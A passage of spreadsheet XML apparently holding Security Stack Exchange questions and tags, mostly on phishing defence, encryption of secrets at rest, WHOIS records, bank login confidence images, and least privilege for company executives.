    <t>&lt;p&gt;My Drupal 7.28 site has been hacked through the the tmp dir which was not protected by .htaccess file. The hacker managed to delete the main .htaccess file and upload some bogus google docs 2014 directory with php files to the site. After some work I managed to fix the site by getting rid of the offending php files and replacing the .htaccess files. Everything is fine now except that he/she managed to create a phishing form called gmail_webmail.html which originally comes with Google docs. This form which was originally a file he uploaded and I deleted is still viewable on my site. I don't know how he did it. There is no html file called gmail_webmail.html in the root Drupal directory yet when I go to www.mysite/gmail_webmail.html I get this form which Norton blocks right away. Google also warned me of the existence of this form. It is not a module as far as I can tell. Can anyone help? Thank you in advance.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;drupal&gt;</t>
  </si>
  <si>
    <t>Design proposals for enhanced security for parts of Internet, e.g. for banking?</t>
  </si>
  <si>
    <t>&lt;p&gt;There is some recent discussion of some sort of &amp;quot;multilevel&amp;quot; internet, with e.g. a level defined for banking in which access is only granted after special authentication with &amp;quot;true names&amp;quot;, special credentials, and an explicit consent to permit packet searches:&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://www.nextgov.com/nextgov/ng_20110706_1137.php?oref=topnews" rel="nofollow noreferrer"&gt;Former CIA Director: Build a new Internet to improve cybersecurity - Nextgov&lt;/a&gt;&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;&amp;quot;The most important value of a dot-secure domain is that, like dot-gov and dot-mil, now we can satisfy consent under the Fourth Amendment search requirements for the government's defenses to do their work within that domain, their work of screening for attack signals, botnets and viruses.&amp;quot;&lt;/p&gt;
 &lt;p&gt;searches of the .gov domain are conducted by the Einstein program, an intrusion prevention and detection system under the direction of the Homeland Security Department that monitors only federal traffic for signs of unauthorized access.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Has anyone seen any technical proposals for how to design something along those lines which might actually result in improved security? Or is this just bad reporting or clueless bureaucrats speaking?&lt;/p&gt;
 &lt;p&gt;This is sometimes associated with a &amp;quot;.secure&amp;quot; top-level domain, but without a lot of other mechanisms that of course wouldn't do anything to help security.&lt;/p&gt;
 &lt;p&gt;And assuming that the websites in this .secure level of the Internet all use SSL all the time, what good would it do for the government to have legal permission to search packets?&lt;/p&gt;
 &lt;p&gt;Alternatively I guess I could imagine some sort of big semi-public VPN to which access is controlled - has that been explored? But finding mechanisms that are resistant to phishing or DDoS still seem pretty hard.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;network&gt;&lt;tls&gt;&lt;attack-prevention&gt;&lt;research&gt;&lt;government&gt;</t>
  </si>
  <si>
    <t>What is a secure way to encrypt critical secrets for a person likely to be individually targeted</t>
  </si>
  <si>
    <t>&lt;p&gt;I read several guides and Stackexchange answers, but the more I know, the more I realise how much I don't know. What I learnt is that details of implementation matter and that most popular tools do something wrong.&lt;/p&gt;
 &lt;p&gt;I can reasonably expect to be individually targeted because of the nature and publicity of my work. I actually were targeted before (unsuccessfully) and I feel that I need to be ready, sooner or later, for more knowledgeable and crypto-sophisticated adversaries (but non-governments). I'm a freelancer, so I don't have any big company behind me which resources I could use for security protocols.&lt;/p&gt;
 &lt;p&gt;I've been using aes-256-cbc via openssl enc (with default parameters) my entire life, but as my work is getting more publicity and the likelihood of me being targeted increases, I decided to upgrade to a "golden standard".&lt;/p&gt;
 &lt;p&gt;Cryptographic Right Answers (Latacora, Ptacek) agree to recommend using "NaCl/libsodium‚Äôs default", but these are libraries and, as far as I know, don't provide executables. I'm fairly technical and I can program, but I'm not familiar with C language. There are 3rd party libsodium bindings for other languages, so I guess I could cook something up, but I would prefer not to reinvent the wheel and I look for the least error-prone way.&lt;/p&gt;
 &lt;p&gt;I already know &lt;a href="https://security.stackexchange.com/questions/182277/is-openssl-aes-256-cbc-encryption-safe-for-offsite-backup"&gt;several reasons&lt;/a&gt; to don't use openssl cli. I'm not sure &lt;a href="https://hub.packtpub.com/chacha20-poly1305-vulnerability-issue-affects-openssl-1-1-1-and-1-1-0/" rel="nofollow noreferrer"&gt;if it can be trusted&lt;/a&gt; with its implementation of Latacora/Ptacek's 2nd preference ChaCha20-Poly1305 (and if yes, what additional parameters should be specified, if any). It doesn't support their 3rd preference at all (AES-GCM). I also read that gpg has weak key stretching. This exhausts my knowledge of popular linux encryption tools.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Questions:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Is there actually any tool which does encryption "right" out of the box and provides linux shell interface?&lt;/p&gt;
 &lt;p&gt;If not, is there any tool which does it "right" when configured properly and can you provide the "right" set of parameters?&lt;/p&gt;
 &lt;p&gt;Or maybe it's best to take node.js or Python bindings for libsodium, make a tiny wrapper and use defaults?&lt;/p&gt;
 &lt;p&gt;Side question: are there any special considerations to take when encrypting very short pieces of data? Some things which I encrypt are encryption keys or passphrases which are just dozens of bytes long (I know that my currently used AES-CBC is a block cipher, so there's some padding which can be tricky, etc).&lt;/p&gt;
 &lt;p&gt;Am I being too paranoid wanting to switch from openssl enc aes-256-cbc (considering I can expect to be individually targeted)?&lt;/p&gt;
 &lt;p&gt;Thank you!&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edit to clarify:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;I want to encrypt files at rest.&lt;/p&gt;
 &lt;p&gt;Adversaries won't be opportunistic and I expect them to spend resources on cracking encryption. They will specifically target what I do and they will know that the data exists &lt;em&gt;somewhere&lt;/em&gt;. I might sound a bit paranoid and I admit that I have a paranoid-ish attitude to security, but I think it's the right attitude to this matter and it actually saved my data at least once in the past.&lt;/p&gt;
 &lt;p&gt;I'm aware of rubber-hose cryptanalysis and I try to include it in my planning to some degree. If you could help planning for this as well, I would be grateful. Right now my plan is to retrieve previously prepared fake data (encrypted using a different key than the real data), hope that it will be realistic enough to satisfy attackers and that they won't be so thorough to demand me to decrypt virtually everything what they find despite already having what they came for.&lt;/p&gt;
 &lt;p&gt;So, what I was meaning when writing this question was specifically situation in which attackers try to decrypt my encrypted files using technology (non-wrench based). E.g:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;They gained access to encrypted data by compromising my device or by social engineering of 3rd parties (I store copies of some encrypted data online at cloud storages and offline at 3rd parties), but either don't have physical access to me or are not ready to escalate this way. For the most critical data, I don't access it often and even compromising my device most likely wouldn't give access to encryption key (e.g. by seeing it at decryption).&lt;/li&gt;
 &lt;li&gt;They gained physical access to me and were fooled by my fake data, but later discovered it's fake so they try to decrypt any other data which they gained access to "in bulk" when they had access to me (or before that).&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Deniability for existence of encrypted data might help to protect the real data in situations with physical access to me. Especially if attackers also gained access to offline copy stored at 3rd party, so they know that the data is exactly there (and they gained this access independently, so I cannot retrieve fake data from a different 3rd party). Deniability would allow keeping both files at the same place and decrypt only the fake one without anyone recognising existence of another one. But I consider this last scenario (gaining access to me and to data independently) the least likely, so I guess deniability is not at the top of my requirements.&lt;/p&gt;
 &lt;p&gt;As for comfortable access to data: the data I'm the most concerned with is not data I access frequently. I can handle a complex and not very comfortable process if it benefits security. However I would like decryption to be a process which average person (not very technical, but also not stupid) is able to perform when given very detailed written instructions. I need and have procedures to access the data and encryption keys by specific people after my death (don't misunderstand me: I'm not that paranoid that I think someone wants to kill me. I just know that of all possible disaster scenarios death is actually the most probable - meaning, I will die at some point in the future - and I need other people to access some of the data then).&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Edited to provide more overall assessment of my situation:&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Because of what I do (which I would like to not disclose), people/groups might get an idea to breach my secrets for their profit. It happened in the past. I was specifically targeted and someone tried to get access to several of my critical digital assets (access to email, hijack domains, other) using targeted phishing (i.e. not looking like a part of a broad/universal campaign) and social engineering towards 3rd parties. None of this was successful and I did not detect who it was (it stopped some time ago and I think/hope they moved on to focus on easier targets). But because my work is getting more and more publicity, I can reasonably expect more attacks in the future, as they're common and somehow expected in my field. I am not trying to protect against any specific adversary which I know of today, and I don't know who my future adversary might be tomorrow, but I'm in a high-risk group of people likely to be targeted.&lt;/p&gt;
 &lt;p&gt;I take a lot of measures to protect my data. The first line of defence is "trying to don't get hacked". The second one is to try to minimise damage in case of a breach (and here is where my concerns over encryption belong). &lt;/p&gt;
 &lt;p&gt;Huge part of my strategy in this area is based on compartmentalization. E.g. my most sensitive data is almost never decrypted on my main computer. I have a separate computer to work on the most sensitive stuff and I try to isolate it as good as I can:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;It usually stays offline and connects only to upload or backup encrypted data (or more rarely: download encrypted data to work on). All these connections are only to my storage.&lt;/li&gt;
 &lt;li&gt;I don't do any communication from it and don't even have configured any communication methods. If I need to send data to someone else or upload somewhere else than my standard storage, I encrypt it for someone and upload to storage, then download it on my main computer and send away without being able to decrypt it on main computer.&lt;/li&gt;
 &lt;li&gt;I don't do any browsing from it (even accidentally, as it's blocked on firewall). If I need to research something for work, I do it on the main computer.&lt;/li&gt;
 &lt;li&gt;I don't plug it anywhere other than electric outlet and don't connect to any peers (even when I want to transfer encrypted results to my main computer, I do it through intermediary storage).&lt;/li&gt;
 &lt;li&gt;It's stored in a safe when I'm not working on it. Besides the safe, I don't leave it unattended ever (never leave it in a car trunk or gym locker, etc). I don't travel with it. Of course it uses full disk encryption, but it could be rendered useless if someone tampered with the computer physically.&lt;/li&gt;
 &lt;li&gt;(To think of it, I am hardly ever seen with this computer in public as it almost never leaves my office. I sometimes (rarely) take it home (where I have another safe). I don't think I ever worked on it in a public place. I don't think anyone other than my family even seen this computer. This is not some idea for a master-strategy for security through obscurity, just a conclusion that if I will be physically targeted, an adversary will most likely not even know about this device and target my main computer which I often carry with me).&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;It might look complicated and uncomfortable, but it sounds worse than it is. It's just a basic hygiene and not being sluggish. Also, it's only 10% of my work, the rest of which I am comfortable doing using my main computer (which I also take care to secure as good as I can).&lt;/p&gt;
 &lt;p&gt;I wrote that the most sensitive data is &lt;em&gt;almost never&lt;/em&gt; decrypted on the main computer and someone answered that if I'm targeted, they will attack when the content is unencrypted. The "never decrypt" rule is one that I take seriously. It happened only few times during several years, when faced with emergency-kind need for access the data and only small subset of data were involved (and the same subset each time). Compartmentalization also means separating sets of data and encrypting them using different keys. I did not have any indication I was being actively targeted at that time or that I could be hacked and I took a calculated risk (which I wouldn't even take if it would involve more than this subset of data). Also, I redesigned my processes to minimise risk of such situations in the future.&lt;/p&gt;
 &lt;p&gt;The point of all this is: while I try to don't get hacked as much as I can, if this ever happened (either directly me or via access to a 3rd party responsible for storage), an attacker would only gain access to encrypted data, as I don't usually decrypt sensitive data on my main computer. Of course they would also gain access to a lot of other data on my main computer, but I'm most concerned about data which I don't access from it. This is a scenario which I want your help to protect from and I think it covers most online / non-physical threats.&lt;/p&gt;
 &lt;p&gt;I could really use some strictly technical help with how to encrypt data in rest for this scenario using some "golden standards" of modern cryptography.&lt;/p&gt;
 &lt;p&gt;As for &lt;a href="https://xkcd.com/538/" rel="nofollow noreferrer"&gt;https://xkcd.com/538/&lt;/a&gt; - I really don't know how to prepare for this other than providing bogus or partial data. I can't try total deniability, because attacker will know what they came for. Not very specifically "what-what" or "how much of what", but they will have a general idea of the "kind of what". I can try "partial deniability", which is to feed them with bogus data, or even a moderately valuable subset of real data (which don't really look like a subset or incomplete data; nobody outside knows on how many different projects I work and I'm publicly associated to only smart part of them; so by "subset of data" I usually mean "data for some projects, but not all"). I have several separate subsets of data, encrypted with several keys, some of which I don't need to access anymore on a regular basis. It's believable (and also true) that I'm not able to decrypt everything without visiting some physical locations where I keep old encryption keys. Also in this scenario hard to break encryption will help, as attackers will most likely make a copy of everything, including data which I'm not able to decrypt without accessing offsite keys, and might try to decrypt it later.
 If anyone has other suggestions for this kind of threats (physical), I'm very curious to read about it too.&lt;/p&gt;
 &lt;p&gt;This is the best of what I can think in terms of risk assessment. I don't know if it's a "proper risk assessment" according to your standards, but I hope you can use it to help me with my questions.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;encryption&gt;&lt;cryptography&gt;&lt;linux&gt;</t>
  </si>
  <si>
    <t>Link test differs from link location in plaintext view is not visible in Thunderbird</t>
  </si>
  <si>
    <t>&lt;p&gt;Today I noticed something strange.&lt;/p&gt;
 &lt;p&gt;I got an email containing a link that links to another site than the text says. In (Simple) HTML, the review is visible when hovering over the link.
 However, in plaintext, in 3 out of 4 mails only the a.com was shown&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;a.com
 &amp;lt;b.com&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;This makes me a bit worried however, since I only noticed the difference of displayed text and link location once another client answered, that probably had HTML view turned on.&lt;/p&gt;
 &lt;p&gt;If I switch the view of the message body to Simple HTML, I need to check if the link matches the location &lt;em&gt;visually&lt;/em&gt;, which I want to avoid, because that might be error-prone. I do know that I could configure my Thunderbird to simply show me puny-code, but then one unaware click in the wrong moment could be fatal.&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;What are security-wise recent best practices to both protect yourself from clicking malicious links as well as detecting that someone has sent such a malicious link?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Specifically, is there a way to always get shown&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;a.com
 &amp;lt;b.com&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;in plaintext, but with the displayed part only marked as the link's location, whenever the link's text part displays an URL?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;url&gt;&lt;thunderbird&gt;</t>
  </si>
  <si>
    <t>Whois History resources authentic source</t>
  </si>
  <si>
    <t>&lt;p&gt;I have couple of doubts related to Whois records.
 For a particulate domain... &lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;How authentic are the Whois records?&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;As per my research the records are not permissible in courts (or at least would not be considered primary evidence). As I can register a domain providing false information (or in someone else' name) and so, not considered authentic.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Who is responsible for authenticity of these records?&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I guess it should be the job of Registrar to validate the information provided. On the other hand I am certain if one is buying a domain for personal use no verification is done(Registrar sell it like popcorn). Does that also apply for buying a domain for business or in the name of business.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Who would stop someone from even registering f4c3b00k.com (assuming availability) &lt;strong&gt;using following information?&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;pre&gt;&lt;code&gt;Registrant Name: Mark Zuckerberg
 Registrant Organization: Facebook, Inc.
 Registrant Street: 1601 Willow Rd 
 Registrant City: Menlo Park
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;&lt;em&gt;Please note I am not talking about the situation where facebook would come to know about this domain and initiate UDRP. I am interested in knowing any controls that are placed at the time of registering a domain by ICANN/ Registry/ Registrar&lt;/em&gt;&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;What are whois history records?&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Do they contain information on ownership of certain domain.
 If yes, certain.domain has 2 Whois history records. Does this mean certain.domain has been transferred to other person or in other words registrant information has been changed one time&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Which should be the accurate source for Whois/ Whois history records? The registry itself or the registrar? &lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Also please provide some good resouce/link on searching for Whoi History records. Most sites offer it as a paid service while others providing varying information.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;websites&gt;&lt;dns-domain&gt;&lt;domain&gt;&lt;whois&gt;</t>
  </si>
  <si>
    <t>What's the best way to securely obtain and submit a Malware Sample for analysis?</t>
  </si>
  <si>
    <t>&lt;p&gt;We get a lot of spam/phishing emails with suspicious attachments and i will like to know the best way to submit this for analysis without getting your own system infected. &lt;/p&gt;
 &lt;p&gt;I currently save the file locally and then upload to a site like virustotal, malwr.com or mcafee. but i feel its possible malware can execute based on copy and paste. Please help&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;virus&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How do "Confidence images" on my bank's login page improve security?</t>
  </si>
  <si>
    <t>&lt;p&gt;My bank recently changed their login process to show a preselected image which they label a "Confidence image" - ostensibly to allow a human website user to authenticate the bank's website as not being a spoof.&lt;/p&gt;
 &lt;p&gt;The old login process was:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Visit BankName.com (entire site is secured with an EV certificate)&lt;/li&gt;
 &lt;li&gt;Click Login link, a &lt;code&gt;GET&lt;/code&gt; request to their login page&lt;/li&gt;
 &lt;li&gt;Enter username and password, &lt;code&gt;POST&lt;/code&gt; submit form&lt;/li&gt;
 &lt;li&gt;Receive &lt;code&gt;HTTP 303&lt;/code&gt; redirection to account dashboard page&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;The new process is:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Visit BankName.com (entire site is secured with an EV certificate)&lt;/li&gt;
 &lt;li&gt;Click Login link, a &lt;code&gt;GET&lt;/code&gt; request to their login page&lt;/li&gt;
 &lt;li&gt;Enter username and password, &lt;code&gt;POST&lt;/code&gt; submit form&lt;/li&gt;
 &lt;li&gt;Receive &lt;code&gt;HTTP 303&lt;/code&gt; redirection to "Confidence image" page, which shows a picture I previously selected, it also prompts me to re-enter my password for a second time. After &lt;code&gt;POST&lt;/code&gt;ing this form it redirects to my account dashboard page.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I don't see how this adds any actual security - any MITM, or any proxy for that matter (assuming the TLS security is compromised somehow) could forward the confidence image and I would recognize it. Similarly a spoof website need only forward my own credentials to the real bank login page, get a copy of the confidence image, and re-serve that - which would fool a less sophisticated user very easily.&lt;/p&gt;
 &lt;p&gt;Only a very basic spoof website (with a hard-coded confidence image page) would cause users to see the discrepancy, but the biggest problem is that it only shows the image &lt;em&gt;after&lt;/em&gt; I have already entered my password - so the feature is useless because the spoof or attack website has already got a copy of my username and password.&lt;/p&gt;
 &lt;p&gt;I remember at one point Yahoo's OpenID login page did show a confidence-image, while that was after I entered my username,t crucially it was &lt;em&gt;before&lt;/em&gt; I entered my password (so the login process was split between two forms) - I believe it was also based on a HTTP-only cookie, so logging in to Yahoo in a clean browser wouldn't trigger the confidence image.&lt;/p&gt;
 &lt;p&gt;Using human-intelligence to perform mutual-authentication seems like a bad idea - X.509 certificates already perform the role of server authentication, and EV certificates make this easier for less sophisticated users ("look for the green"). I fail to see the motivation... or success behind this move, and am frustrated by having to jump through another hoop to login to my bank.&lt;/p&gt;
 &lt;h2&gt;UPDATE: A few weeks after my bank introduced these confidence-images they changed the login process so you enter your password after seeing the image:&lt;/h2&gt;
 &lt;ol&gt;
 &lt;li&gt;Visit BankName.com, click the Login link&lt;/li&gt;
 &lt;li&gt;Enter username only.&lt;/li&gt;
 &lt;li&gt;Response page has the confidence-image and a password input box&lt;/li&gt;
 &lt;li&gt;Submit with the correct password to get to your account dashboard&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/131353/how-do-confidence-images-on-my-banks-login-page-improve-security#comment245090_131355"&gt;An interesting comment by Joshua suggests&lt;/a&gt; that these images could help in MITM situations provided every image request is logged and could be used as evidence of a phish attack, like so:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;User clicks link in phishing email, opens TotallyNotFakeBank.com/login&lt;/li&gt;
 &lt;li&gt;This login page only has a username prompt.&lt;/li&gt;
 &lt;li&gt;After submitting the username, the MITM server makes a new request to the real bank website and gets the real confidence image. This request will be from the MITM's own IP address
 (Hypothetically the MITM site could use the client/victim to make an AJAX request for the image, but if CORS and other restrictions are set-up correctly this should be impossible)&lt;/li&gt;
 &lt;li&gt;The MITM generates the fake confidence-image page and re-serves the image to the victim, and the victim passes their password.&lt;/li&gt;
 &lt;li&gt;The victim subsequently loses money after the attackers use the credentials to get money from the account.&lt;/li&gt;
 &lt;li&gt;The victim informs their bank and the bank checks the access-logs of the confidence image and sees that the original request for the confidence-image did not come from their usual web-browser, leading the bank to believe their customer's story instead of assuming it was a false report.&lt;/li&gt;
 &lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;web-application&gt;&lt;mutual&gt;</t>
  </si>
  <si>
    <t>How Anti Phishing in Google Safe Browsing works?</t>
  </si>
  <si>
    <t>&lt;p&gt;As the question says, can anybody give insights on how anti phishing works in &lt;a href="https://www.google.com/transparencyreport/safebrowsing/diagnostic/" rel="nofollow noreferrer"&gt;Google Safe Browsing&lt;/a&gt;?&lt;/p&gt;
 &lt;p&gt;Does it just use a database of detected phishing URLs or does it use any heuristic?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;safe-browsing-filter&gt;</t>
  </si>
  <si>
    <t>Finding phishing sites to certain domain</t>
  </si>
  <si>
    <t>&lt;p&gt;My work currently involve finding phishing site to a certain domain/ company. I was wondering if there are some tools/ Online services that I can use to find phishing sites. I would like to know;&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Searching for registered domains based on keyword?&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;There are tons of online service which will allow you to search for domains that are &lt;code&gt;unregistered&lt;/code&gt; or &lt;code&gt;available for sale&lt;/code&gt; but none I could find which would allow me search for only &lt;code&gt;registered&lt;/code&gt; ones. What I am looking for here is all the registered domain that are based on my keyword.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Finding phishing sites based on deceptive domains?&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I use bit of bitsquatting/ Addition/ Deletion/ Omission to look for registered domain that are deceptive to the domain in question. I am looking for an automated tool which can apply some other techniques if there are. For e.g. If I am looking for phishing domains of company.com I am hardly likely to arrive at comapanypvtltd.com ..etc.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Finding phishing sites based on Keywords?&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Searching based on keywords is hard and produces a lot of noise. I would consider the company name, keywords from their respective industry. For e.g. digibucks.com a made-up online digital currency company, I am definitely going to look for digibuckswallet.com and other gTLD &amp;amp; ccTLD of same.
 I am looking for a tool or online service which offers similar functionality.
 FYI dnslytics.com has the similar feature to search for domains based on keywords. Sometimes its result are very good.&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Finding phishing site based on similar look and feel?&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I am particularly interested in this as I have not been able to find any good resource on this. I was wondering if It would be possible to search for websites that look exactly the same as website in question. It is possible search based on HTML/CSS of the page or any other techniques around it.&lt;/p&gt;
 &lt;p&gt;Any additional techniques/ resource would be greatly appreciated.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;kali-linux&gt;&lt;dns-domain&gt;&lt;domain&gt;</t>
  </si>
  <si>
    <t>How to detect which app I'm in?</t>
  </si>
  <si>
    <t>&lt;p&gt;As a user, How to detect which app I'm using?&lt;/p&gt;
 &lt;p&gt;Let's say that I opened application A. Then, Application A sends me a third party Login Activity from Application B.&lt;/p&gt;
 &lt;p&gt;How can I know if I'm typing my credentials on a phishing activity from Application A or I'm typing it on the Application B?&lt;/p&gt;
 &lt;p&gt;The overview screen from Android application can be easy manipulated to mimic Application B.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Can the creator of Bitly links be determined from the link?</t>
  </si>
  <si>
    <t>&lt;p&gt;Let's say that an attacker is using Bitly's web API to generate large numbers of bitly links.&lt;/p&gt;
 &lt;p&gt;If we have the bitly link (e.g. &lt;code&gt;http://bit.ly/1gX2dD0&lt;/code&gt;), is there any way to trace that bitly link back to the creator (e.g. bitly API account) of the link?&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;Note: I'm asking about this in the context of the &lt;a href="https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign" rel="nofollow noreferrer"&gt;Russian spearphishing story&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>In what way is a partially encrypted webpage insecure?</t>
  </si>
  <si>
    <t>&lt;p&gt;What are the potential vulnerabilities that might arise if a webpage is only partially encrypted.&lt;/p&gt;
 &lt;p&gt;I can think of 2 possibilities:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;&lt;p&gt;You can change the non-encrypted parts of the page (HTML, CSS, Images, JS) through a MITM attack to partially change the look of the page.&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;You could inject malicious JS through the insecure connection in order to steal/modify the encrypted parts of the page thus rendering the entire connection insecure.&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;Is the 2nd scenario possible or do web browsers incorporate some security mechanisms to prevent it from happening?&lt;/p&gt;
 &lt;p&gt;This question also has implications with regards to the Stack Exchange n/w, since only the iframe containing the login form inside the login page is encrypted :
 &lt;a href="https://meta.stackexchange.com/questions/96004/login-to-stack-exchange-account-doesnt-use-https-ssl"&gt;https://meta.stackexchange.com/questions/96004/login-to-stack-exchange-account-doesnt-use-https-ssl&lt;/a&gt;&lt;/p&gt;
 &lt;h1&gt;Update:&lt;/h1&gt;
 &lt;p&gt;As @Ladada pointed out, this question is actually broken into multiple parts:&lt;/p&gt;
 &lt;h2&gt;Case 1: An insecure page loading a secure iframe to transmit confidential data&lt;/h2&gt;
 &lt;p&gt;&lt;strong&gt;Answer&lt;/strong&gt;: As davidwebster48 pointed out in his answer, this mechanism is trivially defeated since the insecure parent page can be manipulated to load the iframe with a different page of the attacker's liking. As a side note, this means that StackExchange's login system is vulnerable to MITM attacks despite using https login forms.&lt;/p&gt;
 &lt;h2&gt;Case 2: A secure page loading an insecure page via an iframe&lt;/h2&gt;
 &lt;p&gt;(Assuming no confidential data is handled by the insecure iframe). This case is particularly interesting in that Same-Origin policies also come into the equation. Even if both pages may be from the same domain, since they both use different protocols, (one HTTPS and the other HTTP) this will cause same-origin restrictions to kick in. I am not sure whether these restrictions are enough to stop our attacker dead in his tracks.&lt;/p&gt;
 &lt;h2&gt;Case 3: A secure page linking to insecure JS&lt;/h2&gt;
 &lt;p&gt;&lt;strong&gt;My answer&lt;/strong&gt;: I think this is obviously a fail since the attacker could modify the JS file to access/manipulate the entire page.&lt;/p&gt;
 &lt;h2&gt;Case 4: A secure page linking to insecure sources like images, CSS&lt;/h2&gt;
 &lt;p&gt;Could the attacker change enough of the look of the page to do a phishing attack? Or could he mount a Cross-Site Scripting attack?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-application&gt;&lt;tls&gt;&lt;web-browser&gt;</t>
  </si>
  <si>
    <t>It is safe to buy a domain if I get this message in Firefox?</t>
  </si>
  <si>
    <t>&lt;p&gt;I want to buy a domain name from a big registar (well known on the internet) but when I go to checkout I see that my link is going from full encrypted to ‚ÄúConnection Partially Encrypted‚Äù and I am asked to enter my credit card information. My question is, is it safe to enter my credit card and pay? If it's not fully encrypted can my data be sniffed?&lt;/p&gt;
 &lt;p&gt;If it helps, I'm running a Unix-like system, so can't be a keylogger or a hoax or a phishing attack. My hosts file is intact.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;cryptography&gt;&lt;web-application&gt;&lt;encryption&gt;&lt;tls&gt;</t>
  </si>
  <si>
    <t>Applying "principle of least privilege" when it comes to execs and owners of the company - should they automatically get all permissions if requested?</t>
  </si>
  <si>
    <t>&lt;p&gt;As an administrator of certain systems in a company I understand and adhere to the "principle of least privilege" -- which I'm assuming I don't need to repeat its definition here, so let's just say people here get given access to systems only in accordance with what they need for their role and no more. I follow that principle and check carefully whether they can have read-only access in order to carry out the role and if so I give read access only, etc.&lt;/p&gt;
 &lt;p&gt;I had a request from an executive-level (C-suite) person ("Jack", let's say) who is actually one of the five co-owners of the company, to get blanket "sysadmin" level access to a particular system. (I am confident the request has come from Jack himself and isn't a hacking or phishing attempt, as I verified it with Jack directly.)&lt;/p&gt;
 &lt;p&gt;Jack is far too important and involved with strategic stuff to need to carry out any day-to-day work with this system, especially anything that would need sysadmin level access, but occasionally wants to get involved in "poking around" in there, as he is technical by background.&lt;/p&gt;
 &lt;p&gt;I get the sense that he doesn't like the idea that he is "walled off" from some system although he owns part of the company.&lt;/p&gt;
 &lt;p&gt;I'm not asking about the interpersonal aspects about this, just the info-sec ones.&lt;/p&gt;
 &lt;p&gt;Is it accepted info-sec practice to give an owner of the company "sysadmin" access and by doing bypass the "principle of least privilege"? -- since, after all, Jack (partly) owns the company so it's all his stuff anyway!&lt;/p&gt;
 &lt;p&gt;Or should that still apply, and even the CEO shouldn't have write-access to a system when they don't need it as part of their job function?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;privileged-account&gt;&lt;administration&gt;</t>
  </si>
  <si>
    <t>Reminder: Reset your password - phishing or genuine Facebook email?</t>
  </si>
  <si>
    <t>&lt;p&gt;An email claiming to be from facebook had the following content:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Hi Andrew,
  You recently requested a new password for your Facebook account. It looks like we sent you an email with a link to reset your password a few days ago. This is a reminder that you can log back into your account at any time by clicking this link and entering in a new Facebook password.&lt;/p&gt;
